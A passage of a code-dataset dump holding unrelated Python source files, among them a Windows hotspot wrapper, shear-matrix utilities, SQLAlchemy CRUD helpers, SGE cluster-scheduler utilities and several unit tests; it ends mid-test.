id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
5060341 | # Python wrapper for starting wireless access points on Windows
import time
import logging
import os, sys
from optparse import OptionParser
class AP():
def __init__(self, opts):
self.SSID = opts.SSID
self.KEY = opts.KEY
def start_AP(self):
os.popen("netsh wlan set hostednetwork mode=allow ssid={0} key={1}".format(self.SSID, self.KEY))
os.popen("netsh wlan start hostednetwork")
def stop_AP(self):
os.popen("netsh wlan stop hostednetwork")
def main():
# Setup the command line arguments.
optp = OptionParser()
# Output verbosity options
optp.add_option('-q', '--quiet', help='set logging to ERROR',
action='store_const', dest='loglevel',
const=logging.ERROR, default=logging.INFO)
optp.add_option('-d', '--debug', help='set logging to DEBUG',
action='store_const', dest='loglevel',
const=logging.DEBUG, default=logging.INFO)
optp.add_option('-v', '--verbose', help='set logging to COMM',
action='store_const', dest='loglevel',
const=5, default=logging.INFO)
# Option for ssid of access point to broadcast
optp.add_option("-s", "--ssid", dest="SSID",
help="The SSID of access point")
# Option for key to access point
optp.add_option("-k", "--key", dest="KEY",
help="The key for the access point")
opts, args = optp.parse_args()
if opts.SSID is None:
opts.SSID = raw_input("SSID for the access point being broadcast: ")
if opts.KEY is None:
opts.KEY = raw_input("Key for the access point being broadcast (8-63 charcters): ")
# Setup logging.
logging.basicConfig(level=opts.loglevel,
format='%(levelname)-8s %(message)s')
# Main Event Execution:
try:
ap = AP(opts)
ap.start_AP()
while True:
time.sleep(1)
except (KeyboardInterrupt, EOFError) as e:
ap.stop_AP()
print "All done!"
exit(0)
if __name__ == '__main__':
main()
| StarcoderdataPython |
8023841 | ''' Functions for working with shears
Terms used in function names:
* *mat* : array shape (3, 3) (3D non-homogenous coordinates)
* *aff* : affine array shape (4, 4) (3D homogenous coordinates)
* *striu* : shears encoded by vector giving triangular portion above diagonal
of NxN array (for ND transformation)
* *sadn* : shears encoded by angle scalar, direction vector, normal vector
(with optional point vector)
'''
import math
import warnings
import numpy as np
from .utils import normalized_vector, vector_norm
# Caching dictionary for common shear Ns, indices
_shearers = {}
for n in range(1,11):
x = (n**2 + n)/2.0
i = n+1
_shearers[x] = (i, np.triu(np.ones((i,i)), 1).astype(bool))
def striu2mat(striu):
''' Construct shear matrix from upper triangular vector
Parameters
----------
striu : array, shape (N,)
vector giving triangle above diagonal of shear matrix.
Returns
-------
SM : array, shape (N, N)
shear matrix
Examples
--------
>>> S = [0.1, 0.2, 0.3]
>>> striu2mat(S)
array([[1. , 0.1, 0.2],
[0. , 1. , 0.3],
[0. , 0. , 1. ]])
>>> striu2mat([1])
array([[1., 1.],
[0., 1.]])
>>> striu2mat([1, 2])
Traceback (most recent call last):
...
ValueError: 2 is a strange number of shear elements
Notes
-----
Shear lengths are triangular numbers.
See http://en.wikipedia.org/wiki/Triangular_number
'''
n = len(striu)
# cached case
if n in _shearers:
N, inds = _shearers[n]
else: # General case
N = ((-1+math.sqrt(8*n+1))/2.0)+1 # n+1 th root
if N != math.floor(N):
raise ValueError('%d is a strange number of shear elements' %
n)
N = int(N)
inds = np.triu(np.ones((N,N)), 1).astype(bool)
M = np.eye(N)
M[inds] = striu
return M
def sadn2mat(angle, direction, normal):
"""Matrix for shear by `angle` along `direction` vector on shear plane.
The shear plane is defined by normal vector `normal`, and passes through
the origin. The direction vector must be orthogonal to the plane's normal
vector.
A point P is transformed by the shear matrix into P" such that
the vector P-P" is parallel to the direction vector and its extent is
given by the angle of P-P'-P", where P' is the orthogonal projection
of P onto the shear plane.
Parameters
----------
angle : scalar
angle to shear, in radians
direction : array-like, shape (3,)
direction along which to shear
normal : array-like, shape (3,)
vector defining shear plane, where shear plane passes through
origin
Returns
-------
mat : array shape (3,3)
shear matrix
Examples
--------
>>> angle = (np.random.random() - 0.5) * 4*math.pi
>>> direct = np.random.random(3) - 0.5
>>> normal = np.cross(direct, np.random.random(3))
>>> S = sadn2aff(angle, direct, normal)
>>> np.allclose(1.0, np.linalg.det(S))
True
"""
if abs(np.dot(normal, direction)) > 1e-5:
raise ValueError("direction, normal vectors not orthogonal")
normal = normalized_vector(normal)
direction = normalized_vector(direction)
angle = math.tan(angle)
M = np.eye(3)
M += angle * np.outer(direction, normal)
return M
def sadn2aff(angle, direction, normal, point=None):
"""Affine for shear by `angle` along vector `direction` on shear plane.
The shear plane is defined by a point and normal vector. The direction
vector must be orthogonal to the plane's normal vector.
A point P is transformed by the shear matrix into P" such that
the vector P-P" is parallel to the direction vector and its extent is
given by the angle of P-P'-P", where P' is the orthogonal projection
of P onto the shear plane.
Parameters
----------
angle : scalar
angle to shear, in radians
direction : array-like, shape (3,)
direction along which to shear
normal : array-like, shape (3,)
vector normal to shear-plane
point : None or array-like, shape (3,), optional
point, that, with `normal` defines shear plane. Defaults to
None, equivalent to shear-plane through origin.
Returns
-------
aff : array shape (4,4)
affine shearing matrix
Examples
--------
>>> angle = (np.random.random() - 0.5) * 4*math.pi
>>> direct = np.random.random(3) - 0.5
>>> normal = np.cross(direct, np.random.random(3))
>>> S = sadn2mat(angle, direct, normal)
>>> np.allclose(1.0, np.linalg.det(S))
True
"""
M = np.eye(4)
normal = normalized_vector(normal)
direction = normalized_vector(direction)
angle = math.tan(angle)
M[:3, :3] = np.eye(3) + angle * np.outer(direction, normal)
if point is not None:
M[:3, 3] = -angle * np.dot(point, normal) * direction
return M
def mat2sadn(mat):
"""Return shear angle, direction and plane normal from shear matrix.
Parameters
----------
mat : array-like, shape (3,3)
shear matrix
Returns
-------
angle : scalar
angle to shear, in radians
direction : array, shape (3,)
direction along which to shear
normal : array, shape (3,)
vector defining shear plane, where shear plane passes through
origin
Examples
--------
>>> M = sadn2mat(0.5, [1, 0, 0], [0, 1, 0])
>>> angle, direction, normal = mat2sadn(M)
>>> angle, direction, normal
(0.5, array([-1., 0., 0.]), array([ 0., -1., 0.]))
>>> M_again = sadn2mat(angle, direction, normal)
>>> np.allclose(M, M_again)
True
"""
mat = np.asarray(mat)
# normal: cross independent eigenvectors corresponding to the eigenvalue 1
l, V = np.linalg.eig(mat)
near_1, = np.nonzero(abs(np.real(l.squeeze()) - 1.0) < 1e-4)
if near_1.size < 2:
raise ValueError("no two linear independent eigenvectors found %s" % l)
V = np.real(V[:, near_1]).squeeze().T
lenorm = -1.0
for i0, i1 in ((0, 1), (0, 2), (1, 2)):
n = np.cross(V[i0], V[i1])
l = vector_norm(n)
if l > lenorm:
lenorm = l
normal = n
normal /= lenorm
# direction and angle
direction = np.dot(mat - np.eye(3), normal)
angle = vector_norm(direction)
direction /= angle
angle = math.atan(angle)
return angle, direction, normal
def aff2sadn(aff):
"""Return shear angle, direction and plane normal from shear matrix.
Parameters
----------
mat : array-like, shape (3,3)
shear matrix.
Returns
-------
angle : scalar
angle to shear, in radians
direction : array, shape (3,)
direction along which to shear
normal : array, shape (3,)
vector normal to shear plane
point : array, shape (3,)
point that, with `normal`, defines shear plane.
Examples
--------
>>> A = sadn2aff(0.5, [1, 0, 0], [0, 1, 0])
>>> angle, direction, normal, point = aff2sadn(A)
>>> angle, direction, normal, point
(0.5, array([-1., 0., 0.]), array([ 0., -1., 0.]), array([0., 0., 0.]))
>>> A_again = sadn2aff(angle, direction, normal, point)
>>> np.allclose(A, A_again)
True
"""
warnings.warn('This function can be numerically unstable; use with care')
aff = np.asarray(aff)
angle, direction, normal = mat2sadn(aff[:3,:3])
# point: eigenvector corresponding to eigenvalue 1
l, V = np.linalg.eig(aff)
near_1, = np.nonzero(abs(np.real(l.squeeze()) - 1.0) < 1e-8)
if near_1.size == 0:
raise ValueError("no eigenvector corresponding to eigenvalue 1")
point = np.real(V[:, near_1[-1]]).squeeze()
point = point[:3] / point[3]
return angle, direction, normal, point
| StarcoderdataPython |
12815866 | <filename>tests/full/test.py
from typing import Dict
from gura import ParseError
import unittest
import gura
import math
import os
class TestFullGura(unittest.TestCase):
file_dir: str
parsed_data: Dict
def setUp(self):
self.file_dir = os.path.dirname(os.path.abspath(__file__))
self.expected = {
"a_string": "test string",
"int1": +99,
"int2": 42,
"int3": 0,
"int4": -17,
"int5": 1000,
"int6": 5349221,
"int7": 5349221,
"hex1": 3735928559,
"hex2": 3735928559,
"hex3": 3735928559,
"oct1": 342391,
"oct2": 493,
"bin1": 214,
"flt1": +1.0,
"flt2": 3.1415,
"flt3": -0.01,
"flt4": 5e+22,
"flt5": 1e06,
"flt6": -2E-2,
"flt7": 6.626e-34,
"flt8": 224617.445991228,
"sf1": math.inf,
"sf2": math.inf,
"sf3": -math.inf,
"null": None,
"empty_single": {},
"bool1": True,
"bool2": False,
"1234": "1234",
"services": {
"nginx": {
"host": "127.0.0.1",
"port": 80
},
"apache": {
"virtual_host": "10.10.10.4",
"port": 81
}
},
"integers": [1, 2, 3],
"colors": ["red", "yellow", "green"],
"nested_arrays_of_ints": [[1, 2], [3, 4, 5]],
"nested_mixed_array": [[1, 2], ["a", "b", "c"]],
"numbers": [0.1, 0.2, 0.5, 1, 2, 5],
"tango_singers": [
{
"user1": {
"name": "Carlos",
"surname": "Gardel",
"year_of_birth": 1890
}
}, {
"user2": {
"name": "Aníbal",
"surname": "Troilo",
"year_of_birth": 1914
}
}
],
"integers2": [
1, 2, 3
],
"integers3": [
1,
2
],
"my_server": {
"host": "127.0.0.1",
"empty_nested": {},
"port": 8080,
"native_auth": True
},
"gura_is_cool": "Gura is cool"
}
self.maxDiff = 4096999
def __get_file_parsed_data(self, file_name) -> Dict:
"""
Gets the content of a specific file parsed
:param file_name: File name to get the content
:return: Parsed data
"""
full_test_path = os.path.join(self.file_dir, f'tests-files/{file_name}')
with open(full_test_path, 'r') as file:
content = file.read()
return gura.loads(content)
def test_loads(self):
"""Tests all the common cases except NaNs"""
parsed_data = self.__get_file_parsed_data('full.ura')
self.assertDictEqual(parsed_data, self.expected)
def test_loads_nan(self):
"""Tests NaNs cases as they are an exceptional case"""
parsed_data = self.__get_file_parsed_data('nan.ura')
for value in parsed_data.values():
self.assertTrue(math.isnan(value))
def test_dumps(self):
"""Tests dumps method"""
parsed_data = self.__get_file_parsed_data('full.ura')
string_data = gura.dumps(parsed_data)
new_parsed_data = gura.loads(string_data)
self.assertDictEqual(new_parsed_data, self.expected)
def test_dumps_nan(self):
"""Tests dumps method with NaNs values"""
parsed_data_nan = self.__get_file_parsed_data('nan.ura')
string_data_nan = gura.dumps(parsed_data_nan)
new_parsed_data_nan = gura.loads(string_data_nan)
for value in new_parsed_data_nan.values():
self.assertTrue(math.isnan(value))
def test_empty(self):
"""Tests empty Gura documents"""
parsed_data = gura.loads('')
self.assertDictEqual(parsed_data, {})
def test_empty_2(self):
"""Tests empty Gura documents, even when some data is defined"""
parsed_data = gura.loads('$unused_var: 5')
self.assertDictEqual(parsed_data, {})
def test_invalid_key(self):
"""Tests invalid key"""
with self.assertRaises(ParseError):
gura.loads('with.dot: 5')
def test_invalid_key_2(self):
"""Tests invalid key"""
with self.assertRaises(ParseError):
gura.loads('"with_quotes": 5')
def test_invalid_key_3(self):
"""Tests invalid key"""
with self.assertRaises(ParseError):
gura.loads('with-dashes: 5')
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
6648743 | <filename>sql_app/crud.py
from sqlalchemy.orm import Session
from . import models, schemas
def db_commit(db: Session, db_model):
db.add(db_model)
db.commit()
db.refresh(db_model)
def get_user(db: Session, user_id: str):
return db.query(models.User).filter(models.User.uid == user_id).first()
def get_users(db: Session, skip: int = 0, limit: int = 100):
return db.query(models.User).offset(skip).limit(limit).all()
def create_user(db: Session, user: schemas.UserCreate):
db_user = models.User(uid=user.uid, name=user.name, picture=user.picture)
db_commit(db, db_user)
return db_user
def get_games(db: Session, skip: int = 0, limit: int = 100):
return db.query(models.Game).offset(skip).limit(limit).order_by("score desc, level desc").all()
def create_user_game(db: Session, game: schemas.GameCreate, user_id: str):
game.owner_id = user_id
db_game = models.Game(**game.dict())
try:
db_commit(db, db_game)
except Exception as e:
raise Exception('Game commit error', e)
return db_game
def get_games(db: Session, limit: int = 20):
return db.query(models.Game).order_by(
models.Game.level.desc(), models.Game.score.desc()).limit(limit).all()
def get_user_games(db: Session, user_id: str, skip: int = 0, limit: int = 20):
return db.query(models.Game).filter(
models.Game.owner_id == user_id).offset(skip).limit(limit).all()
def get_user_game(db: Session, user_id: str, level: int = 1):
return db.query(models.Game).filter(
models.Game.owner_id == user_id,
models.Game.level == level
).first()
def get_user_style(db: Session, user_id: str):
return db.query(models.Style).filter(
models.Style.owner_id == user_id).first()
def create_user_style(db: Session, style: schemas.StyleCreate, user_id: str):
style.owner_id = user_id
db_style = models.Style(**style.dict())
try:
db_commit(db, db_style)
except Exception as e:
raise Exception("create style error")
return db_style
| StarcoderdataPython |
1937 | <filename>tests/python/correctness/simple_test_aux_index.py
#! /usr/bin/env python
#
# ===============================================================
# Description: Sanity check for fresh install.
#
# Created: 2014-08-12 16:42:52
#
# Author: <NAME>, <EMAIL>
#
# Copyright (C) 2013, Cornell University, see the LICENSE file
# for licensing agreement
# ===============================================================
#
import sys
try:
import weaver.client as client
except ImportError:
import client
config_file=''
if len(sys.argv) > 1:
config_file = sys.argv[1]
# create client object
c = client.Client('172.16.17.32', 2002, config_file)
# check aux index
assert c.aux_index()
# 1. create node for user ayush
c.begin_tx()
c.create_node('ayush')
c.set_node_properties({'type': 'user', 'age': '25'}, 'ayush')
c.end_tx()
# 2. create node for user egs
c.begin_tx()
c.create_node('egs')
c.set_node_property('type', 'user', 'egs')
c.end_tx()
# 3. ayush follows egs
c.begin_tx()
c.create_edge('ayush', 'egs', 'e1')
c.set_edge_property(edge='e1', key='type', value='follows')
c.create_edge('egs', 'ayush', 'e2')
c.set_edge_property(edge='e2', key='type', value='followed_by')
c.end_tx()
# 4. add a post and restrict visibility to followers only
c.begin_tx()
c.create_node('post')
c.set_node_property('type', 'post', 'post')
c.set_node_property('visibility', 'followers', 'post')
e3 = c.create_edge('egs', 'post')
c.set_edge_property(edge=e3, key='type', value='posted')
c.end_tx()
# 5. 'like' the post
c.begin_tx()
e4 = c.create_edge('post', 'ayush')
c.set_edge_property(edge=e4, key='type', value='liked_by')
c.end_tx()
# 6. list all the people who like egs's post
return_nodes = c.traverse('egs', {'type': 'user'}).out_edge({'type': 'posted'}).node({'type': 'post'}).out_edge({'type': 'liked_by'}).node({'type': 'user'}).execute()
assert len(return_nodes) == 1, 'traversal returned incorrect #nodes'
assert 'ayush' in return_nodes, 'traversal returned bad node handle'
# 7. try to create node with same handle as before
c.begin_tx()
c.create_node('ayush')
try:
c.end_tx()
assert False, 'create node passed'
except client.WeaverError:
pass
# 8. try to create edge with same handle as before
c.begin_tx()
c.create_edge('ayush', 'egs', 'e1')
try:
c.end_tx()
assert False, 'create edge passed'
except client.WeaverError:
pass
# 9. add auxiliary handles to nodes
c.begin_tx()
c.add_alias('ad688', 'ayush')
c.add_alias('el33th4x0r', 'egs')
c.end_tx()
# 10. list all the people who like egs's post
# this time with aliases instead of handles
return_nodes = c.traverse('el33th4x0r', {'type': 'user'}).out_edge({'type': 'posted'}).node({'type': 'post'}).out_edge({'type': 'liked_by'}).node({'type': 'user'}).execute()
assert len(return_nodes) == 1, 'traversal returned incorrect #nodes'
assert 'ayush' in return_nodes, 'traversal returned bad node handle'
# 11. get node and check it is valid
ad = c.get_node('ayush')
assert 'ad688' in ad.aliases
assert 'type' in ad.properties
assert 'user' in ad.properties['type']
assert 'age' in ad.properties
assert '25' in ad.properties['age']
assert 'e1' in ad.out_edges
print 'Correctly executed 11 transactions of varying complexity, pass simple_test.'
print 'Success, you have a working Weaver setup!'
| StarcoderdataPython |
9642290 | __all__ = ('tag', 'reader', 'gui', 'exceptions')
| StarcoderdataPython |
384174 | from ._docstrings import setup_anndata_dsp
from ._track import track
__all__ = ["track", "setup_anndata_dsp"]
| StarcoderdataPython |
159145 | """
Implementation of DDPG - Deep Deterministic Policy Gradient
Algorithm and hyperparameter details can be found here:
http://arxiv.org/pdf/1509.02971v2.pdf
The algorithm is tested on the Pendulum-v0 OpenAI gym task
and developed with tflearn + Tensorflow
Author: <NAME>
"""
from .tf_ddpg_agent import TensorFlowDDPGAgent
| StarcoderdataPython |
8160772 | <reponame>jhkuang11/UniTrade
# -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-11-11 01:01
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import sorl.thumbnail.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=30, unique=True)),
('slug', models.SlugField(blank=True, unique=True)),
],
options={
'verbose_name_plural': 'Categories',
},
),
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('price', models.DecimalField(decimal_places=2, max_digits=12)),
('description', models.TextField(blank=True, default='')),
('create_time', models.DateTimeField(auto_now=True)),
('image', sorl.thumbnail.fields.ImageField(upload_to='items')),
('category', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='items', to='onlinestore.Category')),
('seller', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['title'],
},
),
]
| StarcoderdataPython |
8138154 | <reponame>jgleissner/aws-parallelcluster-node
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
import collections
import logging
import re
from xml.etree import ElementTree
from common import sge
from common.remote_command_executor import RemoteCommandExecutor
from common.schedulers.converters import ComparableObject, from_xml_to_obj
from common.sge import check_sge_command_output, run_sge_command
QConfCommand = collections.namedtuple("QConfCommand", ["command_flags", "successful_messages", "description"])
QCONF_COMMANDS = {
"ADD_ADMINISTRATIVE_HOST": QConfCommand(
command_flags="-ah",
successful_messages=[r".* added to administrative host list", r'adminhost ".*" already exists'],
description="add administrative hosts",
),
"ADD_SUBMIT_HOST": QConfCommand(
command_flags="-as",
successful_messages=[r".* added to submit host list", r'submithost ".*" already exists'],
description="add submit hosts",
),
"REMOVE_ADMINISTRATIVE_HOST": QConfCommand(
command_flags="-dh",
successful_messages=[
r".* removed .* from administrative host list",
r'denied: administrative host ".*" does not exist',
],
description="remove administrative hosts",
),
"REMOVE_SUBMIT_HOST": QConfCommand(
command_flags="-ds",
successful_messages=[r".* removed .* from submit host list", r'denied: submit host ".*" does not exist'],
description="remove submission hosts",
),
"REMOVE_EXECUTION_HOST": QConfCommand(
command_flags="-de",
successful_messages=[r".* removed .* from execution host list", r'denied: execution host ".*" does not exist'],
description="remove execution hosts",
),
}
# The state of the queue - one of u(nknown), a(larm), A(larm), C(alendar suspended), s(uspended),
# S(ubordinate), d(isabled), D(isabled), E(rror), c(configuration ambiguous), o(rphaned), P(reempted),
# or some combination thereof.
# Refer to qstat man page for additional details.
# o(rphaned) is not considered as busy since we assume a node in orphaned state is not present in ASG anymore
SGE_BUSY_STATES = ["u", "C", "s", "D", "E", "P"]
# This state is set by nodewatcher when the node is locked and is being terminated.
SGE_DISABLED_STATE = "d"
# If an o(rphaned) state is displayed for a queue instance, it indicates that the queue instance is no longer demanded
# by the current cluster queue configuration or the host group configuration. The queue instance is kept because jobs
# which have not yet finished are still associated with it, and it will vanish from qstat output when these jobs
# have finished.
SGE_ORPHANED_STATE = "o"
# The states q(ueued)/w(aiting) and h(old) only appear for pending jobs. Pending, unheld job`s are displayed as qw.
# The h(old) state indicates that a job currently is not eligible for execution due to a hold state assigned to it
# via qhold(1), qalter(1) or the qsub(1) -h option, or that the job is waiting for completion of the jobs for which job
# dependencies have been assigned to it job via the -hold_jid or -hold_jid_ad options of qsub(1) or qalter(1).
SGE_HOLD_STATE = "h"
# If the state is u, the corresponding sge_execd(8) cannot be contacted.
# An E(rror) state is displayed for a queue for various reasons such as failing to find executables or directories.
# If an o(rphaned) state is displayed for a queue instance, it indicates that the queue instance is no longer demanded
# by the current cluster queue configuration or the host group configuration. The queue instance is kept because jobs
# which have not yet finished are still associated with it, and it will vanish from qstat output when these jobs have
# finished.
SGE_ERROR_STATES = ["u", "E", "o"]
def exec_qconf_command(hosts, qhost_command):
if not hosts:
return []
hostnames = ",".join([host.hostname for host in hosts])
try:
logging.info("Executing operation '%s' for hosts %s", qhost_command.description, hostnames)
command = "qconf {flags} {hostnames}".format(flags=qhost_command.command_flags, hostnames=hostnames)
# setting raise_on_error to False and evaluating command output to decide if the execution was successful
output = check_sge_command_output(command, raise_on_error=False)
succeeded_hosts = []
# assuming output contains a message line for each node the command is executed for.
for host, message in zip(hosts, output.split("\n")):
if any(re.match(pattern, message) is not None for pattern in qhost_command.successful_messages):
succeeded_hosts.append(host)
return succeeded_hosts
except Exception as e:
logging.error(
"Unable to execute operation '%s' for hosts %s. Failed with exception %s",
qhost_command.description,
hostnames,
e,
)
return []
def add_hosts_to_group(hosts):
logging.info("Adding %s to @allhosts group", ",".join([host.hostname for host in hosts]))
command = "qconf -aattr hostgroup hostlist {hostname} @allhosts"
return _run_sge_command_for_multiple_hosts(hosts, command)
def add_host_slots(hosts):
logging.info("Adding %s to all.q queue", ",".join([host.hostname for host in hosts]))
command = 'qconf -aattr queue slots ["{hostname}={slots}"] all.q'
return _run_sge_command_for_multiple_hosts(hosts, command)
def remove_hosts_from_group(hosts):
logging.info("Removing %s from @allhosts group", ",".join([host.hostname for host in hosts]))
command = "qconf -dattr hostgroup hostlist {hostname} @allhosts"
return _run_sge_command_for_multiple_hosts(hosts, command)
def remove_hosts_from_queue(hosts):
logging.info("Removing %s from all.q queue", ",".join([host.hostname for host in hosts]))
command = "qconf -purge queue '*' all.q@{hostname}"
return _run_sge_command_for_multiple_hosts(hosts, command)
def install_sge_on_compute_nodes(hosts, cluster_user):
"""Start sge on compute nodes in parallel."""
command = (
"sudo sh -c 'ps aux | grep [s]ge_execd || "
"(cd {0} && {0}/inst_sge -noremote -x -auto /opt/parallelcluster/templates/sge/sge_inst.conf)'"
).format(sge.SGE_ROOT)
hostnames = [host.hostname for host in hosts]
result = RemoteCommandExecutor.run_remote_command_on_multiple_hosts(command, hostnames, cluster_user, timeout=20)
succeeded_hosts = []
for host in hosts:
if host.hostname in result and result[host.hostname]:
succeeded_hosts.append(host)
return succeeded_hosts
def lock_host(hostname):
logging.info("Locking host %s", hostname)
command = ["qmod", "-d", "all.q@{0}".format(hostname)]
run_sge_command(command)
def unlock_host(hostname):
logging.info("Unlocking host %s", hostname)
command = ["qmod", "-e", "all.q@{0}".format(hostname)]
run_sge_command(command)
def _run_sge_command_for_multiple_hosts(hosts, command_template):
"""Sequentially run an sge command on the master node for the given hostnames."""
succeeded_hosts = []
for host in hosts:
command = command_template.format(hostname=host.hostname, slots=host.slots)
try:
run_sge_command(command.format(hostname=host.hostname))
succeeded_hosts.append(host)
except Exception as e:
logging.error("Failed when executing command %s with exception %s", command, e)
return succeeded_hosts
def _run_qstat(full_format=False, hostname_filter=None, job_state_filter=None):
command = "qstat -xml -g dt -u '*'"
if full_format:
command += " -f"
if hostname_filter:
command += " -l hostname={0}".format(hostname_filter)
if job_state_filter:
command += " -s {0}".format(job_state_filter)
return check_sge_command_output(command)
def get_compute_nodes_info(hostname_filter=None, job_state_filter=None):
output = _run_qstat(full_format=True, hostname_filter=hostname_filter, job_state_filter=job_state_filter)
if not output:
return {}
root = ElementTree.fromstring(output)
queue_info = root.findall("./queue_info/*")
hosts_list = [SgeHost.from_xml(ElementTree.tostring(host)) for host in queue_info]
return dict((host.name, host) for host in hosts_list)
def get_jobs_info(hostname_filter=None, job_state_filter=None):
output = _run_qstat(full_format=False, hostname_filter=hostname_filter, job_state_filter=job_state_filter)
if not output:
return []
root = ElementTree.fromstring(output)
job_info = root.findall(".//job_list")
return [SgeJob.from_xml(ElementTree.tostring(host)) for host in job_info]
def get_pending_jobs_info(max_slots_filter=None, skip_if_state=None):
"""
Retrieve the list of pending jobs.
:param max_slots_filter: discard jobs that require a number of slots bigger than the given value
:param skip_if_state: discard jobs that are in the given state
:return: the list of filtered pending jos.
"""
pending_jobs = get_jobs_info(job_state_filter="p")
if max_slots_filter or skip_if_state:
filtered_jobs = []
for job in pending_jobs:
if max_slots_filter and job.slots > max_slots_filter:
logging.info(
"Skipping job %s since required slots (%d) exceed max slots (%d)",
job.number,
job.slots,
max_slots_filter,
)
elif skip_if_state and skip_if_state in job.state:
logging.info("Skipping job %s since in state %s", job.number, job.state)
else:
filtered_jobs.append(job)
return filtered_jobs
else:
return pending_jobs
class SgeJob(ComparableObject):
# <job_list state="running">
# <JB_job_number>89</JB_job_number>
# <JAT_prio>0.60500</JAT_prio>
# <JB_name>STDIN</JB_name>
# <JB_owner>centos</JB_owner>
# <state>sr</state>
# <JAT_start_time>2019-05-15T13:16:51</JAT_start_time>
# <master>SLAVE</master>
# <slots>1</slots>
# </job_list>
MAPPINGS = {
"JB_job_number": {"field": "number"},
"slots": {"field": "slots", "transformation": int},
"state": {"field": "state"},
"master": {"field": "node_type"},
"tasks": {"field": "array_index", "transformation": lambda x: int(x) if x is not None else None},
"queue_name": {"field": "hostname", "transformation": lambda name: name.split("@", 1)[1] if name else None},
}
def __init__(self, number=None, slots=0, state="", node_type=None, array_index=None, hostname=None):
self.number = number
self.slots = slots
self.state = state
self.node_type = node_type
self.array_index = array_index
self.hostname = hostname
@staticmethod
def from_xml(xml):
return from_xml_to_obj(xml, SgeJob)
class SgeHost(ComparableObject):
# <Queue-List>
# <name><EMAIL>.q@ip-10-0-0-16<EMAIL>-west-1.<EMAIL>.internal</name>
# <qtype>BIP</qtype>
# <slots_used>2</slots_used>
# <slots_resv>0</slots_resv>
# <slots_total>4</slots_total>
# <load_avg>0.01000</load_avg>
# <arch>lx-amd64</arch>
# <job_list state="running">
# <JB_job_number>89</JB_job_number>
# <JAT_prio>0.60500</JAT_prio>
# <JB_name>STDIN</JB_name>
# <JB_owner>centos</JB_owner>
# <state>r</state>
# <JAT_start_time>2019-05-15T13:16:51</JAT_start_time>
# <master>MASTER</master>
# <slots>1</slots>
# </job_list>
# <job_list state="running">
# <JB_job_number>95</JB_job_number>
# <JAT_prio>0.60500</JAT_prio>
# <JB_name>STDIN</JB_name>
# <JB_owner>centos</JB_owner>
# <state>s</state>
# <JAT_start_time>2019-05-15T13:16:51</JAT_start_time>
# <slots>1</slots>
# </job_list>
# </Queue-List>
MAPPINGS = {
"name": {"field": "name", "transformation": lambda name: name.split("@", 1)[1] if name else None},
"slots_used": {"field": "slots_used", "transformation": int},
"slots_total": {"field": "slots_total", "transformation": int},
"slots_resv": {"field": "slots_reserved", "transformation": int},
"state": {"field": "state"},
"job_list": {
"field": "jobs",
"transformation": lambda job: SgeJob.from_xml(ElementTree.tostring(job)),
"xml_elem_type": "xml",
},
}
def __init__(self, name=None, slots_total=0, slots_used=0, slots_reserved=0, state="", jobs=None):
self.name = name
self.slots_total = slots_total
self.slots_used = slots_used
self.slots_reserved = slots_reserved
self.state = state
self.jobs = jobs or []
@staticmethod
def from_xml(xml):
return from_xml_to_obj(xml, SgeHost)
| StarcoderdataPython |
3273056 | import logging
from .get_class_that_defined_method import get_class_that_defined_method
from .now import now
log = logging.getLogger(__name__)
def time_method(f):
def wrap(*args, **kwargs):
defining_class = get_class_that_defined_method(f)
if defining_class is not None:
fn_description = "{0.__name__}::{1.__name__}".format(defining_class, f)
else:
fn_description = f.__name__
time1 = now().timestamp()
ret = f(*args, **kwargs)
time2 = now().timestamp()
log.debug("{0} function took {1:.3f} ms".format(fn_description, (time2 - time1) * 1000.0))
return ret
return wrap
| StarcoderdataPython |
170690 | import pytest
import wtforms
from dmutils.forms.fields import DMRadioField
_options = [
{
"label": "Yes",
"value": "yes",
"description": "A positive response."
},
{
"label": "No",
"value": "no",
"description": "A negative response."
}
]
class RadioForm(wtforms.Form):
field = DMRadioField(options=_options)
@pytest.fixture
def form():
return RadioForm()
@pytest.fixture(params=["yes", "no"])
def form_with_selection(request):
return (RadioForm(data={"field": request.param}), request.param)
@pytest.fixture(params=["true", "false", "garbage", ""])
def form_with_invalid_selection(request):
return (RadioForm(data={"field": request.param}), request.param)
def test_dm_radio_field_has_options_property(form):
assert form.field.options
def test_options_is_a_list_of_dicts(form):
assert isinstance(form.field.options, list)
assert all(isinstance(option, dict) for option in form.field.options)
def test_an_option_can_have_a_description(form):
assert form.field.options[0]['description']
def test_constructor_accepts_choices_parameter():
class RadioForm(wtforms.Form):
field = DMRadioField(choices=[("yes", "Yes"), ("no", "No")])
form = RadioForm()
assert form.field.choices
def test_value_is_none_if_there_is_no_selection(form):
assert form.field.value is None
def test_value_is_the_selected_radio_button(form_with_selection):
form, selection = form_with_selection
assert form.field.value == selection
def test_validation_succeeds_if_value_is_in_options(form_with_selection):
form, _ = form_with_selection
assert form.validate()
def test_validation_fails_if_value_is_not_in_options(form_with_invalid_selection):
form, _ = form_with_invalid_selection
assert not form.validate()
def test_iter_choices(form):
assert list(form.field.iter_choices()) == [("yes", "Yes", False), ("no", "No", False)]
def test_iter_choices_with_selection():
form = RadioForm(data={"field": "yes"})
assert list(form.field.iter_choices()) == [("yes", "Yes", True), ("no", "No", False)]
form = RadioForm(data={"field": "no"})
